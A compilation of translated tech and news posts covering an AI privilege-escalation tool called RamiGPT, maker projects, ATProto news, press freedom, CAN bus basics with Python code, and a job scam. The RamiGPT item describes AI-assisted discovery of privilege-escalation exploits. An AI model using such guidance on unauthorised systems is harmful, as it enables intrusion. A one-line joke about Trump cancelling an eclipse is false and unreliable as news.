

RamiGPT Arrives: the AI That Automates Privilege Escalation (PE) Discovery


A developer using the pseudonym M507 has presented a new open source project, RamiGPT, an AI-based tool that helps automate privilege analysis and vulnerability scanning tasks. The project relies on a connection between OpenAI and Linux and Windows scripts such as LinPEAS and BeRoot. The tool is designed for security researchers and pentesters who need to identify potential privilege escalation vectors on a target system quickly and efficiently.

To work with RamiGPT you need an OpenAI API key, which can be obtained from the OpenAI website after registering. After that, simply copy the settings file .env.example to .env, add your key on the appropriate line, and you can start the system. Two launch scenarios are available: via Docker and in a local environment. In the first case you need to install Docker and Docker Compose, clone the repository, run the containers and open the web interface at 127.0.0.1:5000. The second requires Python 3, pip and the commands that generate the certificates and install the dependencies.

RamiGPT can not only analyse the output of external tools but also automatically recommend running a specific script depending on the operating system: for example, BeRoot on Windows and LinPEAS on Linux. It is also possible to import and export instructions, for instance for capture the flag tasks. All this is accompanied by demo GIF animations that clearly show how the AI identifies vulnerabilities and suggests ways to exploit them.

The project is distributed with the clarification that it is intended exclusively for lawful use, namely for educational purposes or for testing systems for which the user holds official authorisation. The author stresses that any use outside these limits is unacceptable.

You can download and view the project on GitHub: github.com/M507/RamiGPT.

The article RamiGPT Arrives: the AI That Automates Privilege Escalation (PE) Discovery comes from il blog della sicurezza informatica.



AqMood is an Air Quality Monitor with an Attitude


You take your air quality seriously, so shouldn’t your monitoring hardware? If you’re breathing in nasty VOCs or dust, surely a little blinking LED isn’t enough to express your displeasure with the current situation. Luckily, [Tobias Stanzel] has created the AqMood to provide us with some much-needed anthropomorphic environmental data collection.

To be fair, the AqMood still does have its fair share of LEDs. In fact, one might even say it has several devices’ worth of them — the thirteen addressable LEDs that run along the inside of the 3D printed diffuser will definitely get your attention. They’re sectioned off in such a way that each segment of the diffuser can indicate a different condition for detected levels of particulates, VOCs, and CO2.

But what really makes this project stand out is the 1.8 inch LCD mounted under the LEDs. This display is used to show various emojis that correspond with the current conditions. Hopefully you’ll see a trio of smiley faces, but if you notice a bit of side-eye, it might be time to crack a window. If you’d like a bit more granular data, it’s possible to switch this display over to a slightly more scientific mode of operation with bar graphs and exact figures…but where’s the fun in that?

[Tobias] has not only shared all the files that are necessary to build your own AqMood, he’s done a fantastic job of documenting each step of the build process. There’s even screenshots to help guide you along when it’s time to flash the firmware to the XIAO Seeed ESP32-S3 at the heart of the AqMood.

If you prefer your air quality monitoring devices be a little less ostentatious, IKEA offers up a few hackable models that might be more your speed.


hackaday.com/2025/03/27/aqmood…



Half The Reflow Oven You Expected


Toaster oven reflow projects are such a done deal that there should be nothing new in one here in 2025. Take a toaster oven, an Arduino, and a thermocouple, and bake those boards! But [Paul J R] has found a new take on an old project, and better still, he’s found the most diminutive of toaster ovens from the Australian version of Kmart. We love the project for the tiny oven alone.

The brains of the operation is an ESP32, in the form of either a TTGO TTDisplay board or an S3-Zero board on a custom carrier PCB, with a thermistor rather than a thermocouple for the temperature sensing, and a solid state relay to control mains power for the heater. All the resources are in a GitHub repository, but you may have to make do with a more conventionally-sized table top toaster oven if you’re not an Aussie.

If you’re interested, but want a better controller board, we’ve got you covered.


hackaday.com/2025/03/27/half-t…



An Inexpensive Way to Break Down Plastic


Plastic has been a revolutionary material over the past century, with an uncountable number of uses and an incredibly low price to boot. Unfortunately, this low cost has led to its use in many places where other materials might be better suited, and when this huge amount of material breaks down in the environment it can be incredibly persistent and harmful. This has led to many attempts to recycle it, and one of the more promising efforts recently came out of a lab at Northwestern University.

Plastics exist as polymers, long chains of monomers that have been joined together chemically. The holy grail of plastic recycling would be to convert the polymers back to monomers and then use them to re-make the plastics from scratch. This method uses a catalyst to break down polyethylene terephthalate (PET), one of the more common plastics. Once broken down, the PET is exposed to moist air which converts it into its constituent monomers which can then be used to make more PET for other uses.

Of course, the other thing that any “holy grail” of plastic recycling needs is to actually be cheaper and easier than making new plastic from crude oil, and since this method is still confined to the lab it remains to be seen if it will one day achieve this milestone as well. In the meantime, PET can also be recycled fairly easily by anyone who happens to have a 3D printer around.


hackaday.com/2025/03/27/an-ine…



trump: executive order to cancel the solar eclipse of 29/3 in italy: too expensive.


The ATmosphereConf was last weekend, independent relays are starting to appear, and more.


ATmosphere Report – #109


Conference


This weekend was the first ATProto conference, the ATmosphereConf, in Seattle. Over two days there were a large number of speakers and sessions, with over 150 people in attendance, and a significant number watching the live streams as well. I could not make it to the US, so for a full overview of the event, I recommend this extensive article by TechCrunch’s Sarah Perez, who was present at the event. The entire event was livestreamed, and all talks can be viewed via this YouTube playlist.

An assortment of thoughts I had while watching the livestream and VODs over the last few days:

  • Bluesky CEO Jay Graber gave a short speech, about her background as a digital rights activist, and how she is now “holding the door open, so people can see another world is possible”. Graber is clearly aware of her position, where she is seen as a figurehead of the network, while also wanting to build a decentralised network where there is place for competing platforms. Being a figurehead of a network, without becoming the de facto leader of the network, while also holding the leadership position of by far the largest organisation in the network, is a challenging position to balance.
  • Bluesky CTO Paul Frazee talked about where Bluesky came from and where it is going. One of the things he talked about is the consideration of why Bluesky decided on their own protocol and not ActivityPub. His answer focuses on practical considerations, especially how ActivityPub handles identity and account migration. Watching the ATProto Ethos talk by Bluesky protocol engineer Daniel Holmgren it struck me that the question could also be framed as a matter of lineage. Holmgren talks about how ATProto takes inspiration from the Web, Peer to Peer systems as well as Distributed Systems. Placing it in such a context makes it clear that ATProto has quite a different background and other ways of thinking than ActivityPub has.
  • Ændra Rhinisland talked about how community projects can become load-bearing for the network, without adequate support structures for the people who run such projects. She also runs the popular news feeds using Graze. Graze has been adding support for advertisements, and Ændra is one of the first to take advantage. In her talk she walked through how at current usage rates, the feeds could generate over $20k per month in ad revenue. She plans to use this revenue to support the queer communities building on ATProto, and showed early plans for a self-sustaining fund powered by Graze’s feed revenue, to support initiatives such as Northsky.
  • The talk by Ms Boba is a great indication of how much under-explored design space there is on Bluesky and ATProto. Her talk focuses on labelers and fandom communities, and has some great examples of how they can be used outside of moderation.
  • Blacksky founder Rudy Fraser gave an excellent talk, describing Bluesky as a skeuomorphism, meaning that it imitates the design of the product it’s replacing. This phase is a part of the adoption cycle for new technologies, but Fraser does not want to stop at imitation but instead explore the new ways that communities can be built online. Fraser is specifically interested in building platforms that can serve mid-sized communities, ranging from hundreds of thousands to a few million people. The Blacksky community is an example of this, and Fraser hopes that Blacksky can inspire other communities to do the same. His framing of content moderation as community care and not a cost of business also resonated with me.
  • Erin Kissane’s talk goes into detail about vernacular institutions, local and grassroots organisations and practices that are often illegible to outsiders but deeply embedded in local communities. This allows them to be close to the needs of their community members, but makes them hard to see and understand from the outside. This outside illegibility is a double-edged sword: IFTAS served a crucial role for trust and safety in the fediverse ecosystem, but had to shut down due to a lack of funding as a result of being illegible to financiers.

Some more articles on the events:


On relays


Bluesky PBC has been working on a new version of the relay that makes it easier and cheaper to host, under the Sync 1.1 proposal. This new version is now starting to roll out, showing a significant drop in resource usage. Bluesky engineer Bryan Newbold shared some statistics here. Independent ATProto developer @futur.blue set up his own relay as a speedrun. He shows that a full network relay can be run on a 50 USD Raspberry Pi, with an easy-to-follow tutorial here.

That full network ATProto relays are cheap to run has been known for a while within the ATProto developer community, but that knowledge has not spread much yet. One reason for this is that independent developers have set up relays primarily for their own use, sharing access with a few friends, but no other publicly accessible full-network relays exist yet[1].

Upcoming short-form video platform Spark is building their own complete infrastructure. Spark’s relay will be publicly accessible, and hosted in Brazil. Having ATProto infrastructure outside of US jurisdiction is a conversation that has come up regularly, and it is often followed by the assumption that the alternative is to have infrastructure like a relay hosted in Europe. Spark is bringing in a slightly unexpected twist here, by having the first publicly accessible relay that is not owned by Bluesky PBC hosted in Brazil instead.

Having other relays that are not owned by Bluesky PBC has been the subject of a lot of conversation, and the Free Our Feeds campaign was founded on the idea that a significant financial investment is needed to do so. Furthermore, it assumes that such a relay is not only expensive, but that it requires an extensive governance infrastructure to manage it. The current developments regarding relays call both of these assumptions into serious question: relays are cheap, not expensive. Furthermore it seems that there is enough incentive that organisations that are serious about building their own ATProto platforms are willing to run their own relays.

In Other News


Bluesky PBC has published a proposal on how they want to handle OAuth Scopes. OAuth Scopes is one of the main projects on the roadmap for the first half of this year. Currently, logging into an ATProto app via OAuth requires you to give that app permission to access all the data for your account. OAuth Scopes allows an app to ask only for the permissions that are necessary, and not the entire account. There are two problems to solve: the technical part of making it work, and handling the UX so that it communicates clearly to people what data an app wants to access. The challenging part of the UX is how to handle the translation from the technical description of the data that is requested (stylised like ‘app.bsky.feed.getFeed’, for example) into a way that is understandable for the everyday user. The second challenge is that apps require permission not for one, but for many types of this lexicon data. A third-party Bluesky client that is restricted to only Bluesky data will still have to request a dozen of these Lexicons. A long list of technical lexicon names makes it impossible for regular people to have an informed opinion on what data is and is not being accessed. Bluesky PBC’s proposal is to group different lexicons into bundles, and create new lexicons that reference these bundles. Scoped OAuth can then request access to a bundle of lexicons, with a description that is legible for regular people.

Git repository platform Tangled is working on new ideas for how a GitHub alternative might do things differently, and one of their first proposals is defining two types of pull requests. For another look at Tangled, this blog post experiments with what the platform allows.

One of the talks at the ATmosphereConf was by independent developer Rashid Aziz, who is the co-founder of basic.tech. Basic is a protocol for user-owned data, and seems to be fairly comparable to the PDS part of ATProto, with the major difference that Basic allows for private data on their version of a PDS. Aziz used the combination of these two protocols to create private bookmarks for Bluesky.

The new Record Collector labeler automatically displays if someone has been using other apps in the ATmosphere outside of Bluesky.

Rocksky is a new music scrobbler service on ATProto, that is currently in closed beta testing. It allows people to connect their Spotify account and automatically ‘scrobble’ (track) the music they are listening to.

The Links


Some tech-focused links for ATProto:

That’s all for this week, thanks for reading! If you want more analysis, you can subscribe to my newsletter. Every week you get an update with all this week’s articles, as well as extra analysis not published anywhere else. You can subscribe below, and follow this blog @fediversereport.com and my personal account @laurenshof.online on Bluesky.


[1] Cerulea.blue is a publicly accessible relay, using a custom implementation, but it is limited to non-Bluesky PDSes.

#bluesky

fediversereport.com/atmosphere…




If the First Amendment doesn’t work, try the Fifth


Chicago journalist Jim DeRogatis is no criminal, but in 2008 he invoked the Fifth Amendment to avoid testifying at music superstar R. Kelly’s trial. It’s a strategy that more journalists unfortunately may need to consider.

Years earlier, someone sent an unmarked VHS tape depicting Kelly abusing a young girl to DeRogatis. His reporting led to Kelly’s indictment and trial. (The musician was acquitted but is currently in prison for related convictions over a decade later.)

Subpoenaed to testify, DeRogatis, then with the Chicago Sun-Times, invoked Illinois’ reporter’s privilege law. Judge Vincent Gaughan ordered him to take the stand anyway.

But his lawyers (I was a clerk at the firm representing him) realized DeRogatis had potentially, albeit involuntarily, possessed a video containing child sexual abuse material, or CSAM. That is, of course, illegal. Gaughan had no choice but to acknowledge that the prospect that DeRogatis could be prosecuted, however remote, entitled him to invoke his Fifth Amendment protection against self-incrimination.

At the time, DeRogatis’ strategy might’ve been a stretch in non-CSAM cases. Newsgathering is generally safeguarded by the First Amendment. Most journalists need not worry about prosecution.

But things have changed, even if the constitution hasn’t. Here’s a non-exhaustive list of some ways officials around the country have tried to criminalize routine newsgathering in recent years.

  • Prosecutors in Kansas claimed that using a government website violated state computer crime and identity theft laws.
  • Prosecutors in Alabama charged journalists for reporting on a grand jury proceeding.
  • A city attorney in San Francisco, California, accused a journalist of breaking the law by reporting on a tech executive’s sealed arrest report.
  • A state senator in Arizona got a restraining order against a journalist who knocked on her door.
  • A Tampa, Florida, fire chief called police on a journalist for asking for public records.
  • A Chicago suburb ticketed a reporter for calling government officials too often.
  • A Texas citizen journalist was arrested for asking police officers questions.
  • Another Texas citizen journalist was arrested for filming police in public.
  • The Los Angeles County Sheriff’s Department pushed for prosecuting a journalist who reported on a leaked list of problem deputies.
  • Missouri’s governor sought to prosecute a journalist who alerted the state of a security vulnerability on its website.
  • A California city sued a blog under computer crime laws for accessing a publicly available Dropbox.
  • An Ohio journalist was charged for publishing a source’s recording of a court proceeding.
  • Two North Carolina journalists were arrested for reporting on police operations after a park curfew.
  • The federal government argued that publishers could be charged with possessing and transporting stolen property for acquiring documents a source stole.
  • The Biden administration extracted a guilty plea from WikiLeaks founder Julian Assange under the Espionage Act for obtaining and publishing government documents from a source.
  • It also prosecuted journalist Tim Burke under computer fraud and wiretapping laws for downloading publicly available materials on the internet. The case remains pending.
  • The current interim U.S. attorney for the District of Columbia, Ed Martin, has suggested he believes naming federal employees or impeding government work to be illegal.
  • President Donald Trump said in a nationally televised address that he thinks reporting he views as biased against him is against the law.
  • Masked federal agents abducted a graduate student from Tufts University in Massachusetts, and the government revoked her student visa. Her friends think it’s because she cowrote a pro-Palestine op-ed.

If officials keep telling us they see journalism as criminal, journalists should believe them and exercise their rights accordingly. It’ll understandably leave a bad taste in journalists’ mouths to plead the Fifth, but doing so isn’t an admission that you’re guilty — only that the government might think so.

If nothing else, it’ll make quite a statement about the state of press freedom for journalists to have to plead the Fifth like criminals. And in light of the cases listed above, there are hardly any circumstances under which a journalist asked to testify about sources or newsgathering methods doesn’t have a legitimate concern about self-incrimination.

Published documents from the internet against someone’s wishes? Met a confidential source in the park after dark? Obtained names of government workers? Possessed and transported source documents? Your fear of being prosecuted may be every bit as legitimate as DeRogatis’, and arguably more so, since you can point to examples, not just hypotheticals.


This approach isn’t foolproof, particularly when journalists are subpoenaed by the government. Prosecutors can offer journalists immunity, mooting self-incrimination concerns. That’s what the Obama administration did when it wanted then-New York Times journalist James Risen to testify.

But prosecutors don’t always offer immunity, which may require approval from higher-ups and create administrative headaches. And in Trump’s made-for-TV administration, the optics of granting immunity to “enemies of the people” may be so unappealing that they’d rather forgo the testimony.

Plus, many subpoenas to journalists aren’t issued by the government. Some are issued by defense lawyers, others by private litigants in civil lawsuits. The government is unlikely to offer immunity under these circumstances. And agencies like U.S. Immigration and Customs Enforcement, known to issue their own administrative subpoenas to journalists, don’t have the authority to grant immunity on their own.

Even before the recent wave of anti-press criminal theories, journalists like the Detroit Free Press’ David Ashenfelter were able to successfully plead the Fifth in non-CSAM cases. He was subpoenaed in a federal Privacy Act lawsuit over his reporting on a terrorism investigation. After the court declined to apply the reporter’s privilege, he invoked his right against self-incrimination because he could, conceivably, be prosecuted for receiving confidential Justice Department materials.

And almost 20 years ago, Peter Scheer wrote that journalists should consider the Fifth in light of then-Attorney General Alberto Gonzales’ comments in an ABC News interview that journalists could be prosecuted for publishing government secrets.

That prospect is far more realistic now, after the Assange plea deal. We’re no longer talking about TV interviews, but an actual conviction.

I’m not your attorney. I’m not telling you what to do or how. Every case is different. But if you’re subpoenaed and a judge rejects the reporter’s privilege, consider asking your lawyer if the Fifth is an option.

It’s a shame that journalists need to even think about this kind of thing, but protecting sources is paramount, now more than ever.


freedom.press/issues/if-the-fi…




Inside a Fake WiFi Repeater



Fake WiFi repeater with a cheap real one behind it. (Credit: Big Clive, YouTube)

Over the years we have seen a lot of fake electronics, ranging from fake power saving devices that you plug into an outlet, to fake car ECU optimizers that you stick into the OBD port. These are all similar in that they fake functionality while happily lighting up an LED or two to indicate that they’re doing ‘something’. Less expected here was that we’d be seeing fake WiFi repeaters, but recently [Big Clive] got his hands on one and undertook the arduous task of reverse-engineering it.

The simple cardboard box which it comes in claims that it’s a 2.4 GHz unit that operates at 300 Mbps, which would be quite expected for the price. [Clive] obtained a real working WiFi repeater previously that did boast similar specifications and did indeed work. The dead giveaway that it is a fake are the clearly fake antennae, along with the fact that once you plug it in, no new WiFi network pops up or anything else.

Inside the case – which looks very similar to the genuine repeater – there is just a small PCB attached to the USB connector. On the PCB are a 20 ohm resistor and a blue LED, which means that the LED is being completely overdriven as well and is likely to die quite rapidly. Considering that a WiFi repeater is supposed to require a setup procedure, it’s possible that these fake repeaters target an audience which does not quite understand what these devices are supposed to do, but they can also catch more informed buyers unawares who thought they were buying one of the cheap real ones. Caveat emptor, indeed.

youtube.com/embed/BiZZP4YXw9U?…


hackaday.com/2025/03/27/inside…



Your Badminton Racket Needs Restringing? There’s a DIY Machine for That


We don’t often get our badminton rackets restrung, but if we did, [kuokuo702]’s PicoBETH project would be where we’d turn. This is a neat machine build for a very niche application, but it’s also a nicely elaborated project with motors, load cells, and even a sweet knobby-patterned faceplate that is certainly worth a look even if you’re not doing your own restringing.

We’ll admit that everything we know about restringing rackets we learned by watching [kuokuo]’s demo video, but the basic procedure goes like this: you zigzag the string through the holes in the racket, controlling the tension at each stage along the way. A professional racket frame and clamp hold the tension constant while you fiddle the string through the next hole, but getting the tension just right in the first place is the job of [kuokuo]’s machine. It does this with a load cell, stepper motor, and ball screw, all under microcontroller control. Pull the string through, let the machine tension it, clamp it down, and then move on to the next row.

Automating the tension head allows [kuokuo] to do some fancy tricks, like pre-stretching the strings and even logging the tension in the string at each step along the way. The firmware has an extensive self-calibration procedure, and in all seems to be very professional. But it’s not simply functional; it also has a fun LEGO-compatible collection of bumps integrated into the 3D-printed dust cover. That way, your minifigs can watch you at work? Why not!

Automating random chores is a great excuse to build fun little machines, and in that vein, we salute [kuokuo]’s endeavor. Once you start, you’ll find stepper motors sprouting all around like crocuses in a spring field. And speaking of spring, Easter is just around the corner. So if you don’t play badminton, maybe it’s time to build yourself an eggbot.

youtube.com/embed/3ESbAJstZl4?…


hackaday.com/2025/03/27/your-b…



Scuola di Liberalismo 2025: Lucrezia Ercoli – Escape from Freedom

@Politica interna, europea e internazionale

Lucrezia Ercoli teaches “Storia dello spettacolo” at the Accademia di Belle Arti di Bologna. Since 2011 she has been artistic director of “Popsophia”. She has collaborated with the television programme “Terza Pagina” on Rai5 and Rai3 and is a regular presence on the programme “Touch.



Two-factor authentication: digital security is a shared responsibility


@Informatica (Italy e non Italy 😁)
According to a Trend Micro survey, one billion companies worldwide do not use it, even though Europe is a virtuous area. Here are the risks run by those who do not adopt two-factor authentication
The article Two-factor authentication: digital security is



when scuba diving you immediately realise that your buoyancy (tendency to rise or sink, more or less marked) is heavily affected by your lungs and by how much air you use to fill them while breathing. it's no coincidence that taking a big breath of air and starting the descent is "counter-effective". a diver empties the lungs well while pushing downwards, before starting to descend, especially in the first metres of descent, the hardest by definition.

then you discover that the first rudimentary lungs are the evolution, listen carefully.... not of the gills... but of the swim bladder. you know what the swim bladder is for, right? i'll ignore those who don't. so well... in the end everything fits together almost too magnificently.



The Speaker Wars is the new band of ex-Heartbreaker Stan Lynch
freezonemagazine.com/news/the-…
A founding member of Tom Petty’s Heartbreakers, drummer Stan Lynch now has a new band, The Speaker Wars, made up of Stan Lynch – drums, Jon Christopher Davis – vocals, Jay Michael Smith – guitar, Brian Patterson – bass, Steve Ritter – percussion and Jay Brown – keyboards. Stan stated: “After 20


Are these UnipolMove people from Milan?

Or did they just want to pay homage to the most beautiful city in the world?

😍😍😍



USA, #dazi (tariffs) with no brakes


altrenotizie.org/primo-piano/1…


Is Italy able to defend itself? Crosetto explains why it is necessary to act soon

@Notizie dall'Italia e dal mondo

Defence Minister Guido Crosetto reiterated today in Parliament that Italy is not pursuing a rearmament policy but is working to build a defence adequate to global challenges. In a speech to the Foreign Affairs and Defence committees of the Chamber and



Cyber Index PMI: only 15% of Italian companies reach a mature strategy


@Informatica (Italy e non Italy 😁)
Still few Italian companies have a mature cybersecurity strategy: just 15%. That is what emerges from the second Cyber Index PMI report. A comprehensive analysis reveals the weaknesses of small and medium enterprises in managing digital risks, amid growing threats



Defending democracy, the misunderstood challenge of the White Paper on Defence. Zecchini’s analysis

@Notizie dall'Italia e dal mondo

As was predictable, the presentation of the White Paper on European Defence, like the earlier ReArm Europe, has rekindled controversy, populist fury and divisions in Italy on a topic that is vital for the future of the



Supercon 2024: Yes, You Can Use the Controller Area Network Outside of Cars


Ah, the CAN bus. It’s become a communication standard in the automotive world, found in a huge swathe of cars built from the mid-1990s onwards. You’ll also find it in aircraft, ships, and the vast majority of modern tractors and associated farm machines, too.

As far as [Randy Glenn] is concerned, though, the CAN bus doesn’t have to be limited to these contexts. It can be useful far beyond its traditional applications with just about any hardware platform you care to use! He came down to tell us all about it at the 2024 Hackaday Supercon.

youtube.com/embed/Uci5aiDWjFI?…

[Randy]’s talk was titled “Yes, You CAN: Use The Controller Area Network Outside Of Cars.” We have to assume the pun was intended. In any case, the CAN bus came to us from Bosch, which began developing the standard in 1983. The company officially released it at the Society of Automotive Engineers conference in 1986, with compatible chips first hitting the market a year later. It took a little while longer for the standard to find traction, with Mercedes-Benz being the first to implement it in a production vehicle in 1991. It soon caught on with the wider industry as a robust and reliable way to let a vehicle’s various control units communicate with all the important sensors that were proliferating on modern automobiles. CAN got its big break when it was mandated as part of the OBD-II standard in North America, which de facto put it into virtually every car sold in that market from 1996 onwards.

Since then, CAN has proliferated well beyond the automotive space, into marine and aerospace contexts as well. As [Randy] explains, beyond transportation, you’ll also find it in everything from robots to pinball machines and even elevators. Basically, wherever it’s important to have robust local communication between distributed embedded systems, CAN is a great candidate for the job.

Since it’s so widespread, it’s easy to find hardware and software that’s CAN-ready out of the box. The vast majority of microcontroller manufacturers include some sort of CAN peripheral; for example, Espressif’s ESP32 has the “Two-Wire Automotive Interface” (TWAI), which is built for this purpose. Linux is more than happy to talk CAN through its socketcan subsystem, and most programming languages have some sort of library available. Whether you’re working with Arduino, MicroPython, or CircuitPython, you can certainly find what you need. Even if you have a device without CAN built in, like a Raspberry Pi, SPI-attached CAN controllers can be had cheaply from vendors like Microchip.
Depending on your hardware, you might have to add a CAN controller or transceiver to get it talking on the CAN bus. However, this is usually trivial.
There are specific reasons why you might consider CAN for your embedded communication needs. It uses a differential bus, which gives it an inherent ability to resist disruption from electrical noise. Addressing, error-checking, and retransmission functionality are also baked in to CAN controllers, so you don’t have to handle it yourself. You can also find tons of CAN compatible hardware on the market to do whatever you’re trying to do, and a lot of it is pretty cheap because manufacturers are churning it out by the millions.

Of course, there are some limits. Traditionally you’re limited to 32 nodes on a bus, though there are ways to work around that at lower data rates. Peak data rate on a classic CAN bus is 1 Mbit/s, which limits total bus length to about 25 meters; drop to 250 kbit/s and you can stretch that to 250 meters. Frames are also limited to 8 bytes of payload.

Beyond the basic performance specs, [Randy] also explains how you might go about typical implementations with different hardware. For example, if you’ve got a microcontroller with no CAN capability baked in, you might hook it up with a CAN controller and transceiver over SPI. Alternatively, you might choose to work with a more advanced microcontroller that has all the CAN communication hardware built into the chip, simplifying your build. For parts like the ESP32 and some STM32s, you might find you’ve got a CAN controller on board, but you’re lacking the hardware to do the fancy differential signalling—in that case, you just need to hook up a CAN transceiver to get your hardware on the bus. [Randy] also highlights the usual conventions, such as terminology and wire colors, while explaining that these aren’t always rigidly adhered to in the field.
Talking CAN on Linux is as easy as plugging in a cheap USB dongle.
On the communication level, the CAN standard has nodes exchange frames, each carrying up to 8 bytes of data. [Randy] explains how messages are formatted and addressed so that the right nodes pick up the data they’re looking for. There are standard data frames, as well as Remote Transmission Request (RTR) frames, where one node asks another to send its data; a typical example is a controller asking a sensor to report a value. There are also the special error and overload frames, which [Randy] notes are complicated and beyond the scope of his Supercon talk, though he recommends resources that explain them in great detail.
Data of a complete CAN frame laid over the traces of the bus itself. Credit: Ken Tindell, Canis Automotive Labs Ltd. via CC BY-SA 4.0
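The frame layout and the arbitration rule [Randy] walks through can be made concrete with a small socketcan example. The following is an added example, not code from the talk or from Hackaday: it packs and unpacks the 16-byte Linux `struct can_frame` record (the layout and the CAN_EFF/CAN_RTR/CAN_ERR flag bits are the ones in `linux/can.h`), and decides which of several frames transmitted at the same instant wins arbitration by comparing the arbitration fields bit by bit in wire order, where a dominant 0 beats a recessive 1. The constants are real; the frame contents are constructed sample data. One caveat worth keeping in mind before wiring CAN into anything security-sensitive: addressing and priority are by identifier alone, and nothing in a frame identifies or authenticates the node that sent it.

```python
import socket
import struct

# Identifier flag bits and masks from linux/can.h
CAN_EFF_FLAG = 0x80000000  # extended (29-bit) identifier
CAN_RTR_FLAG = 0x40000000  # remote transmission request
CAN_ERR_FLAG = 0x20000000  # error message frame
CAN_SFF_MASK = 0x000007FF
CAN_EFF_MASK = 0x1FFFFFFF
CAN_MAX_DLEN = 8

# struct can_frame: u32 can_id, u8 len, 3 pad bytes, u8 data[8] -> 16 bytes
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)


def pack_frame(can_id, data=b"", extended=False, rtr=False):
    """Build the raw bytes a CAN_RAW socket sends/receives for one classic CAN frame."""
    if len(data) > CAN_MAX_DLEN:
        raise ValueError("classic CAN carries at most 8 data bytes")
    if extended:
        if can_id > CAN_EFF_MASK:
            raise ValueError("extended identifier must fit in 29 bits")
        raw_id = can_id | CAN_EFF_FLAG
    else:
        if can_id > CAN_SFF_MASK:
            raise ValueError("standard identifier must fit in 11 bits")
        raw_id = can_id
    if rtr:
        raw_id |= CAN_RTR_FLAG
    # "8s" pads a short payload with zero bytes; len carries the real DLC
    return struct.pack(CAN_FRAME_FMT, raw_id, len(data), data)


def unpack_frame(raw):
    """Decode a raw socketcan frame into its fields."""
    if len(raw) != CAN_FRAME_SIZE:
        raise ValueError("expected %d bytes" % CAN_FRAME_SIZE)
    raw_id, dlc, data = struct.unpack(CAN_FRAME_FMT, raw)
    if dlc > CAN_MAX_DLEN:
        raise ValueError("DLC above 8 is not a classic CAN frame")
    extended = bool(raw_id & CAN_EFF_FLAG)
    rtr = bool(raw_id & CAN_RTR_FLAG)
    return {
        "id": raw_id & (CAN_EFF_MASK if extended else CAN_SFF_MASK),
        "extended": extended,
        "rtr": rtr,
        "error": bool(raw_id & CAN_ERR_FLAG),
        "dlc": dlc,
        "data": b"" if rtr else data[:dlc],  # an RTR frame carries no payload
    }


def arbitration_bits(frame):
    """Arbitration field as a bit string in wire order; '0' is dominant and wins."""
    if frame["extended"]:
        base, ext = frame["id"] >> 18, frame["id"] & 0x3FFFF
        # 11-bit base ID, SRR (recessive), IDE (recessive), 18-bit extension, RTR
        return f"{base:011b}" + "1" + "1" + f"{ext:018b}" + ("1" if frame["rtr"] else "0")
    # 11-bit ID, RTR, then IDE, which is dominant for a standard frame
    return f"{frame['id']:011b}" + ("1" if frame["rtr"] else "0") + "0"


def arbitration_winner(frames):
    """Return the raw frame that keeps the bus if all of them start transmitting together."""
    return min(frames, key=lambda raw: arbitration_bits(unpack_frame(raw)))


def open_can(ifname="can0"):
    """Raw socket on a socketcan interface (Linux only; e.g. a USB dongle brought up as can0)."""
    s = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    s.bind((ifname,))
    return s


if __name__ == "__main__":
    data_frame = pack_frame(0x123, b"\x01\x02")
    request = pack_frame(0x123, rtr=True)
    print(unpack_frame(data_frame))
    print("winner:", unpack_frame(arbitration_winner([request, data_frame])))
    # On a Linux box with a CAN interface: s = open_can("can0"); s.send(data_frame)
```

The comparison in `arbitration_bits` reproduces two details that trip people up: a data frame beats an RTR frame with the same identifier (the RTR bit is recessive), and a standard frame beats an extended frame that shares its 11-bit base (the SRR and IDE bits are recessive). Nothing in that comparison depends on who is transmitting, which is exactly why a second node choosing the same low identifier can always get its frame onto the bus.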
Much of [Randy]’s talk explains how CAN works. But, as promised, he also takes the time to explain possible non-automotive applications for this technology. He steps through an amusing Halloween build, where a CAN bus is used to trigger scary lightning and sound effects when people press a doorbell.

If you’ve ever wanted a good CAN primer, [Randy]’s talk is just what you need. As far as robust embedded communication standards go, it’s one of the most popular and long-lived out there. It might just pay dividends to put the CAN bus in your own toolbox for future use!


hackaday.com/2025/03/27/superc…




This explains why, for words that just won't come to mind, there is no point insisting to help recall, other than finding a way to re-memorize them along a "more solid" path. For example, for me the word "ingenuo" (naive) is really hard to retrieve when I need it.



“Attack on democracy”: broad outcry for the preservation of freedom of information


netzpolitik.org/2025/angriff-a…



“We have received your CV. Write to me on WhatsApp”: the new and irresistible Job Offer Scam


A phone call from an Italian number. A recorded voice informs you that your curriculum vitae has been received and invites you to save the number and write on WhatsApp to discuss a job offer. It is a scam with a twofold objective: fraudulently acquiring the personal data of the victim, who believes they are taking part in a selection process, and later getting them to invest on an exchange platform. In some variants of this scam, the invitation concerns the purchase of courses or certifications “required” for the job to be performed, or to gain an advantage in the selection.

In any case, it is clear that the cybercriminals’ loot consists of personal data and payments, while the lever used is desire, whose effectiveness increases significantly when the recipient is actively looking for work and is not very aware of these scam schemes.

The attack: an “irresistible” invitation


The bait is precisely that “irresistible” invitation, which is not presented with the emphasis of an unexpected win or the promotion of a once-in-a-lifetime opportunity. Instead it wears the mask of ordinariness, counting on the fact that the unwitting victim has “sent around” their CV and expects (sooner or later) some kind of response. In short: nothing that makes you think you have won Willy Wonka’s Golden Ticket, otherwise the reaction would be suspicion. Ordinariness works better. A pre-recorded message, simple, essential.

Yet it tickles the desire to contact the number, fuelled even more by the hope of finally finding a job. This last element should prompt reflection on the choice of vector, namely the phone call. It lowers the threshold of attention and gives a sense of credibility.

We have received your curriculum. Save this contact and write to me on WhatsApp for more information

All ingredients carefully measured for the scam to succeed.

Be careful, though: while calls of this kind have been widely reported recently, that does not mean SMS or social-network messages are not used as well. On social networks in particular, the messages are directed at members of groups or followers of pages where job offers are posted.

The reason is simple: these are even more specific clusters of potential victims, since what they have in common is an active job search, so the lever of desire can prove an even more effective bet.

The invitation is carefully engineered to be, in effect, as “irresistible” as possible.

The defence: awareness and good cyber hygiene practices


How can you defend yourself? Recognizing these scam schemes is particularly important, since from the days of the well-known Nigerian prince scam the common denominators have inevitably remained the same. All of them are elements that can trigger extra caution, as genuine red flags.

Even better, though, is for some precautions, as good cyber hygiene practices, to be adopted regardless of any alert, as the Polizia Postale e delle Comunicazioni reminds us. The awareness that one’s personal data has value, and is therefore attractive to cybercriminals, is already sufficient reason to adopt safe behaviour: protecting one’s devices, taking care not to open unverified links or attachments, and not sharing any information too lightly.

In short: always think of the worst use someone could make of your information.

Because, rest assured, no cybercriminal will have any qualms about it.

